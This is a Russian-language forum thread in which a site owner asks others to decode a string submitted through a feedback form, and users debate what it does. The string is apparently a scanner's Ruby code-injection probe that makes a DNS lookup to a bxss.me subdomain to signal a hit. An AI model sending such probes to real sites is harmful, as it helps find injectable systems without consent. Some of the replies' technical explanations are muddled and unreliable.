Помогите расшифровать код, из любопытства

12
Z0
На сайте с 03.09.2009
828
broken finger #:

А где там запрос к базе?

Не, я забыл написать, что я не прогер... просто я сагрился на concat и форму обратной связи :)

S3
На сайте с 29.03.2012
368
botir :

Всем привет!

В форму обратной связи получил любопытный код. Онлайн интерпретатор выдает ошибку. На хостинге не решил его запускать.

Прошу помочь его раскодировать, из любопытства хочется узнать, что там ?

'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(108).concat(78)+(require'socket' Socket.gethostbyname('hitod'+'glkgdinyda2b9.bxss.me.')[3].to_s)

Этот код никакого вреда принести не может, это просто кусок. Первую часть правильно привели выше - обычная конкатенация строк, вторая часть - получение данных хостинга и преобразование в строку. но так как в 4-м элементе ответа будет лежать ДНС сервера в бинарном виде - никакого смысла это не даст. Более того, запрос к "hitodglkgdinyda2b9.bxss.me." вернет 500 код, потому что такого адреса не существует, соответственно эта часть вообще или зарейзит эксепшен или вернет None

sergv
На сайте с 13.04.2006
441
Sly32 #:
Более того, запрос к "hitodglkgdinyda2b9.bxss.me." вернет 500 код, потому что такого адреса не существует
Возможно, на момент отправки этого кода адрес существовал.
https://REGHOME.ru - регистрация и продление доменов от 169₽ в российских и международных зонах по честным ценам без звездочек. (R01, WebNames, UK2). Принимаем Ю-Money, Visa, MasterCard, Мир
S3
На сайте с 29.03.2012
368
sergv #:
Возможно, на момент отправки этого кода адрес существовал.

Неважно, даже при удачном запросе  вернется ДНС в бинарном виде, который потом преобразуется в строку и не уверен что там так можно. Но я на Руби не пишу. За 5 минут поставил, запустил, увидел что происходит. 

W1
На сайте с 22.01.2021
306
Sly32 #:
Этот код никакого вреда принести не может, это просто кусок.

Это тестирование на предмет XSS-уязвимости. Вред принесёт тот код, который будет внедрён в случае положительного результата.

Мой форум - https://webinfo.guru –Там я всегда на связи
S3
На сайте с 29.03.2012
368
webinfo #:
Это тестирование на предмет XSS-уязвимости.

Не исключено. А можешь привести алгоритм - как это может работать? 

Для иньекций довольно странный выбор языка. Да и не запустится этот код на руби, даже если он установлен на хостинге. Я пока не вижу вариантов, как такое может повредить.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий